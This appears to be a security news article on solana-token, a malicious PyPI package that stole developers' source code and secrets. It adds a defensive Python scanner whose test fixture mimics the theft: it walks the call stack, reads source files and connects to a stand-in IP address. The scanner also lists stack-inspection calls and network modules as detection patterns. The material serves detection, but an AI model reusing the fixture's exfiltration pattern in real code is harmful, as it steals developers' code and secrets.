Cybersecurity researchers have discovered a malicious package on the Python Package Index (PyPI) repository that purports to be an application related to the Solana blockchain, but contains malicious functionality to steal source code and developer secrets.
The package, named solana-token, is no longer available for download from PyPI, but not before it was downloaded 761 times. It was first published to PyPI in early April 2024, albeit with an entirely different version numbering scheme.
“When installed, the malicious package attempts to exfiltrate source code and developer secrets from the developer’s machine to a hard-coded IP address,” ReversingLabs researcher Karlo Zanki said in a report shared with The Hacker News.
In particular, the package is designed to copy and exfiltrate the source code of every file on the Python execution stack, doing so under the guise of a blockchain function named “register_node().”
This unusual behavior suggests that the attackers are looking to exfiltrate sensitive crypto-related secrets that may be hard-coded in the early stages of writing a program incorporating the malicious function in question.
It’s believed that developers looking to create their own blockchains were the likely targets of the threat actors behind the package. This assessment is based on the package name and the functions built into it.
The exact method by which the package may have been distributed to users is currently not known, although it’s likely to have been promoted on developer-focused platforms.
If anything, the discovery underscores the fact that cryptocurrency continues to be one of the most popular targets for supply chain threat actors, necessitating that developers take steps to scrutinize every package before using it.
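One way to put that scrutiny into practice, as an added example that is not part of the original report and not code from ReversingLabs or from the solana-token package itself: a small static triage script that parses a package's Python sources with the standard `ast` module and flags the combination of behaviours the report describes, namely call-stack introspection (to locate source files), file reads, raw network access, and a hard-coded IP literal. The two embedded samples are constructed fixtures (the address 203.0.113.10 is a documentation range, not the real destination); `register_node`, `scan_source`, `scan_package` and the `Findings` class are names chosen here, not identifiers from the real package.

```python
"""Static triage of Python package sources for the 'walk the stack, read sources,
send to a fixed address' pattern. Run it over an unpacked sdist/wheel *before*
installing the package, since setup.py / __init__.py run on install."""
import ast
import re
from dataclasses import dataclass, field
from pathlib import Path

# A dotted-quad IPv4 literal appearing as a string constant.
IPV4_RE = re.compile(r"^(?:\d{1,3}\.){3}\d{1,3}$")

# Calls that inspect the interpreter's call stack or resolve frames to source files.
STACK_INTROSPECTION = {
    "inspect.stack", "inspect.currentframe", "inspect.getsource",
    "inspect.getsourcefile", "sys._getframe",
}
# Top-level modules that give a package outbound network access.
NETWORK_MODULES = {"socket", "urllib", "http", "requests", "httpx"}


@dataclass
class Findings:
    hardcoded_ips: list = field(default_factory=list)
    stack_calls: list = field(default_factory=list)
    network_modules: list = field(default_factory=list)
    file_reads: int = 0

    def verdict(self) -> str:
        # All three together is the pattern described in the report: locate the
        # caller's source files via the stack, read them, ship them to a fixed host.
        if self.hardcoded_ips and self.stack_calls and self.network_modules:
            return "HIGH"
        if self.hardcoded_ips and self.network_modules:
            return "MEDIUM"
        return "LOW"


def _dotted_name(node: ast.AST) -> str:
    """Render 'a.b.c' from an Attribute/Name chain, or '' if it is not a plain chain."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return ""


def scan_source(code: str) -> Findings:
    """Collect indicators from one module's source text."""
    f = Findings()
    for node in ast.walk(ast.parse(code)):
        if isinstance(node, ast.Constant) and isinstance(node.value, str):
            if IPV4_RE.match(node.value):
                f.hardcoded_ips.append(node.value)
        elif isinstance(node, ast.Import):
            for alias in node.names:
                if alias.name.split(".")[0] in NETWORK_MODULES:
                    f.network_modules.append(alias.name)
        elif isinstance(node, ast.ImportFrom):
            if (node.module or "").split(".")[0] in NETWORK_MODULES:
                f.network_modules.append(node.module)
        elif isinstance(node, ast.Call):
            name = _dotted_name(node.func)
            if name in STACK_INTROSPECTION:
                f.stack_calls.append(name)
            elif name == "open":
                f.file_reads += 1
    return f


def scan_package(root: Path) -> dict:
    """Scan every .py file under an unpacked package; returns {path: Findings}."""
    return {str(p): scan_source(p.read_text(encoding="utf-8", errors="replace"))
            for p in root.rglob("*.py")}


# Constructed fixture mirroring the behaviour the report describes (not the real code).
SUSPICIOUS_SAMPLE = '''
import inspect, socket

def register_node():
    collected = []
    for frame in inspect.stack():
        with open(frame.filename) as fh:
            collected.append(fh.read())
    conn = socket.create_connection(("203.0.113.10", 4444))
'''

# Constructed fixture of ordinary RPC client code: network access, but nothing else.
BENIGN_SAMPLE = '''
import requests

def fetch_block(height):
    return requests.get("https://rpc.example.invalid/block/" + str(height)).json()
'''

if __name__ == "__main__":
    for label, src in (("suspicious", SUSPICIOUS_SAMPLE), ("benign", BENIGN_SAMPLE)):
        findings = scan_source(src)
        print(f"{label}: {findings.verdict()} {findings}")
```

The verdict deliberately keys on co-occurrence rather than any single indicator: a hard-coded IP or a `socket` import alone is common in legitimate code, while a library that also walks the caller's stack and opens the files it finds there has no ordinary reason to do so. Point `scan_package` at the extracted archive from `pip download --no-deps --no-binary :all: <name>` to review a package without executing its install hooks.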
“Development teams need to aggressively monitor for suspicious activity or unexplained changes within both open source and commercial, third-party software modules,” Zanki said. “By stopping malicious code before it is allowed to penetrate secure development environments, teams can prevent the kind of destructive supply chain attacks.”